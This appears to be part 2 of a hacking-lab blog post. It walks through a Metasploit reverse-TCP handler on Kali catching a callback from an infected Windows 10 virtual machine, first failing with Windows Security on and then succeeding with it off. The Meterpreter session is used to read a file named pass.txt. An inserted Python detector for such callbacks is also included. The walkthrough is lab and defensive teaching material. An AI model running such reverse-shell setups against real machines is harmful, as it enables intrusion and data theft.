
[Hacking Lab] Planting it on a virtual Windows 10, part 2 [Security]


********** Previous article **********

********************


6. Lying in wait

Set up a listener on Kali so that the Windows machine can connect back to it once the virus has infected it.

┌──(masaki㉿kali)-[~]
└─$ msfconsole                                                                   130 ⨯

     .:okOOOkdc'           'cdkOOOko:.
   .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
  :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
 oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
 dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
 lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
 .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
  cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
   oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
    lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
     ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
      .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
        ,kOl'M.OOOOOOOOOOOOO.M'dOk,
          :kk;.OOOOOOOOOOOOO.;Ok:
            ;kOOOOOOOOOOOOOOOk:
              ,xOOOOOOOOOOOx,
                .lOOOOOOOl.
                   ,dOd,
                     .
      =[ metasploit v6.0.56-dev                          ]
+ -- --=[ 2154 exploits - 1146 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]
Metasploit tip: Enable HTTP request and response logging
with set HttpTrace true
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload
payload => generic/shell_reverse_tcp
msf6 exploit(multi/handler) >  set LHOST 192.168.56.111
LHOST => 192.168.56.111
msf6 exploit(multi/handler) > exploit -j -z


7. Virus infection (pattern 1)

This is the pattern where the file was downloaded with Windows Security turned ON.

To cut to the chase, it fails: the handler keeps receiving connections, but every shell session is reported as not valid and is closed immediately.

msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [-] Command shell session 1 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 1 closed.
[*] 192.168.56.102 - Command shell session 2 closed.
[*] 192.168.56.102 - Command shell session 3 closed.
[*] 192.168.56.102 - Command shell session 4 closed.
[*] 192.168.56.102 - Command shell session 5 closed.
[*] 192.168.56.102 - Command shell session 6 closed.
[*] 192.168.56.102 - Command shell session 7 closed.
[*] 192.168.56.102 - Command shell session 8 closed.
[*] 192.168.56.102 - Command shell session 9 closed.
[*] 192.168.56.102 - Command shell session 10 closed.
[*] 192.168.56.102 - Command shell session 11 closed.
[-] Command shell session 12 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 12 closed.
[-] Command shell session 13 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 13 closed.
[*] 192.168.56.102 - Command shell session 14 closed.
[-] Command shell session 15 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 15 closed.
[*] 192.168.56.102 - Command shell session 16 closed.
ccccccccccccccccccccccccccInterrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) >

8. Virus infection (pattern 2)

This is the pattern where the file was downloaded with Windows Security turned OFF. This one succeeds: the stage is sent and you can see that a Meterpreter session has been established.

msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.111:4444 -> 192.168.56.102:60593) at 2021-10-17 11:13:17 +0900
msf6 exploit(multi/handler) > session -i
[-] Unknown command: session
msf6 exploit(multi/handler) > sessions -i
Active sessions
===============
 Id  Name  Type                   Information            Connection
 --  ----  ----                   -----------            ----------
 1         meterpreter x64/windo  DESKTOP-F0Q8FDQ\masak  192.168.56.111:4444 ->
           ws                     i @ DESKTOP-F0Q8FDQ     192.168.56.102:60593
                                                         (192.168.56.102)

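As an added example (not part of the original article), the following Python script shows how a defender could spot both patterns from the Windows side using host network-connection records such as Sysmon Event ID 3: it flags any process running from a user-writable folder like Downloads that connects to a non-web port (the single successful callback of pattern 2), and separately flags a burst of repeated callbacks to the same listener, as seen in pattern 1. The log lines, the name dropped.exe and the simplified one-line-per-connection format are constructed assumptions; only the listener address 192.168.56.111:4444 comes from the article.

```python
import re
from datetime import datetime

# Constructed sample (not from the article): one outbound connection per line in a
# simplified Sysmon Event ID 3 style, "date time image dst_ip:dst_port".
# dropped.exe is an assumed name; 192.168.56.111:4444 is the article's handler.
SAMPLE_LOG = """\
2021-10-17 11:13:10 C:\\Users\\masaki\\Downloads\\dropped.exe 192.168.56.111:4444
2021-10-17 11:13:11 C:\\Users\\masaki\\Downloads\\dropped.exe 192.168.56.111:4444
2021-10-17 11:13:12 C:\\Users\\masaki\\Downloads\\dropped.exe 192.168.56.111:4444
2021-10-17 11:13:13 C:\\Users\\masaki\\Downloads\\dropped.exe 192.168.56.111:4444
2021-10-17 11:13:14 C:\\Users\\masaki\\Downloads\\dropped.exe 192.168.56.111:4444
2021-10-17 11:13:15 C:\\Program Files\\Mozilla Firefox\\firefox.exe 192.168.56.1:443
2021-10-17 11:13:17 C:\\Users\\masaki\\Downloads\\dropped.exe 192.168.56.111:4444
"""

LINE_RE = re.compile(r"^(\S+ \S+) (.+) (\d+\.\d+\.\d+\.\d+):(\d+)$")
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\")  # paths a download can run from
WEB_PORTS = {80, 443}

def parse(log):
    """Return (timestamp, image, dst_ip, dst_port) tuples, skipping malformed lines."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3), int(m.group(4))))
    return events

def suspicious(events):
    """Pattern 2 signal: a binary under a user-writable path talking to a non-web
    port. One such event is enough, since a single callback delivers the stage."""
    return [e for e in events
            if any(p in e[1].lower() for p in USER_WRITABLE) and e[3] not in WEB_PORTS]

def reconnect_bursts(events, window=60, threshold=5):
    """Pattern 1 signal: the same image reconnecting to the same listener at least
    `threshold` times inside `window` seconds, as when every shell session is
    closed as invalid and the dropper keeps calling back."""
    by_key = {}
    for ts, image, ip, port in events:
        by_key.setdefault((image, ip, port), []).append(ts)
    bursts = []
    for key, stamps in by_key.items():
        stamps.sort()
        for start in stamps:
            if sum((t - start).total_seconds() <= window for t in stamps if t >= start) >= threshold:
                bursts.append(key)
                break
    return bursts
```

Run against real Sysmon exports by adapting LINE_RE to the field order of the export; the two rules are independent, so either one firing is worth a look.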

9. Intrusion experiment

From here, let's go into the Windows 10 machine and look at the contents of its files.

The contents of pass.txt are exposed.

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Users\masaki\Downloads
meterpreter > cd ..
meterpreter > cd Documents
meterpreter > ls
Listing: C:\Users\masaki\Documents
==================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2021-10-10 21:06:47 +0900  My Music
40777/rwxrwxrwx   0     dir   2021-10-10 21:06:47 +0900  My Pictures
40777/rwxrwxrwx   0     dir   2021-10-10 21:06:47 +0900  My Videos
100666/rw-rw-rw-  402   fil   2021-10-10 21:08:51 +0900  desktop.ini
100666/rw-rw-rw-  14    fil   2021-10-17 11:19:21 +0900  pass.txt
meterpreter > cat pass.txt
sample pas txt
meterpreter >

-------------------------------------------------------

See you again in the next article.

#HackingLab #hacking #security #penetration #kali #kalilinux #linux #vbox #virtualmachine

